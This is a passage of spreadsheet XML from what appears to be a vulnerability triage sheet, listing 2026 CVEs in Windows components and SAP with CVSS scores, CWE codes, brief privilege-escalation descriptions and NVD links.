          <t>CWE-122</t>
        </is>
      </c>
      <c r="S166" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73011</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73015</t>
        </is>
      </c>
      <c r="D167" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E167" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F167" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I167" s="5" t="inlineStr"/>
      <c r="J167" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K16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7" s="5" t="inlineStr"/>
      <c r="M167" s="5" t="inlineStr"/>
      <c r="N167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O167" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P167" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q167" s="5" t="inlineStr"/>
      <c r="R167" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S167" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73015</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73020</t>
        </is>
      </c>
      <c r="D168" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E168" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F168" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K16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8" s="5" t="inlineStr"/>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q168" s="5" t="inlineStr"/>
      <c r="R168" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S168" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73020</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73021</t>
        </is>
      </c>
      <c r="D169" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F169" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K16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9" s="5" t="inlineStr"/>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q169" s="5" t="inlineStr"/>
      <c r="R169" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="S169" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73021</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73026</t>
        </is>
      </c>
      <c r="D170" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F170" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K17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0" s="5" t="inlineStr"/>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q170" s="5" t="inlineStr"/>
      <c r="R170" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S170" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73026</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76967</t>
        </is>
      </c>
      <c r="D171" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F171" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K171" s="5" t="inlineStr"/>
      <c r="L171" s="5" t="inlineStr"/>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q171" s="5" t="inlineStr"/>
      <c r="R171" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S171"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T171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76967</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77489</t>
        </is>
      </c>
      <c r="D172" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F172" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K17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2" s="5" t="inlineStr"/>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q172" s="5" t="inlineStr"/>
      <c r="R172" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S172" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77489</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77500</t>
        </is>
      </c>
      <c r="D173" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F173" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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3" s="5" t="inlineStr"/>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q173" s="5" t="inlineStr"/>
      <c r="R173" s="5" t="inlineStr">
        <is>
          <t>CWE-763</t>
        </is>
      </c>
      <c r="S173" s="5" t="inlineStr">
        <is>
          <t>Release of invalid pointer or reference in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77500</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77503</t>
        </is>
      </c>
      <c r="D174" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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74" s="5" t="inlineStr"/>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q174" s="5" t="inlineStr"/>
      <c r="R174" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S174" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an unauthorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77503</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77904</t>
        </is>
      </c>
      <c r="D175" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F175" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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75" s="5" t="inlineStr"/>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q175" s="5" t="inlineStr"/>
      <c r="R175" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S175" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77904</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78447</t>
        </is>
      </c>
      <c r="D176" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F176" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K17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6" s="5" t="inlineStr"/>
      <c r="M176" s="5" t="inlineStr"/>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q176" s="5" t="inlineStr"/>
      <c r="R176" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S176" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78447</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78448</t>
        </is>
      </c>
      <c r="D177" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F177" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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7" s="5" t="inlineStr"/>
      <c r="M177" s="5" t="inlineStr"/>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q177" s="5" t="inlineStr"/>
      <c r="R177" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S177" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78448</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83498</t>
        </is>
      </c>
      <c r="D178" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F178" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K178" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L178" s="5" t="inlineStr"/>
      <c r="M178" s="5" t="inlineStr"/>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q178" s="5" t="inlineStr"/>
      <c r="R178" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S178" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83498</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83942</t>
        </is>
      </c>
      <c r="D179" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F179" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K17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79" s="5" t="inlineStr"/>
      <c r="M179" s="5" t="inlineStr"/>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q179" s="5" t="inlineStr"/>
      <c r="R179" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S179" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83942</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83952</t>
        </is>
      </c>
      <c r="D180" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F180" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K180" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L180" s="5" t="inlineStr"/>
      <c r="M180" s="5" t="inlineStr"/>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q180" s="5" t="inlineStr"/>
      <c r="R180" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S180" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Resilient File System (ReFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83952</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83954</t>
        </is>
      </c>
      <c r="D181" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F181" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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1" s="5" t="inlineStr"/>
      <c r="M181" s="5" t="inlineStr"/>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q181" s="5" t="inlineStr"/>
      <c r="R181" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S181" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83954</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83955</t>
        </is>
      </c>
      <c r="D182" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F182" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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2" s="5" t="inlineStr"/>
      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q182" s="5" t="inlineStr"/>
      <c r="R182" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S182" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83955</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83967</t>
        </is>
      </c>
      <c r="D183" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F183" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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3" s="5" t="inlineStr"/>
      <c r="M183" s="5" t="inlineStr"/>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q183" s="5" t="inlineStr"/>
      <c r="R183" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S183" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83967</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83968</t>
        </is>
      </c>
      <c r="D184" s="5" t="n">
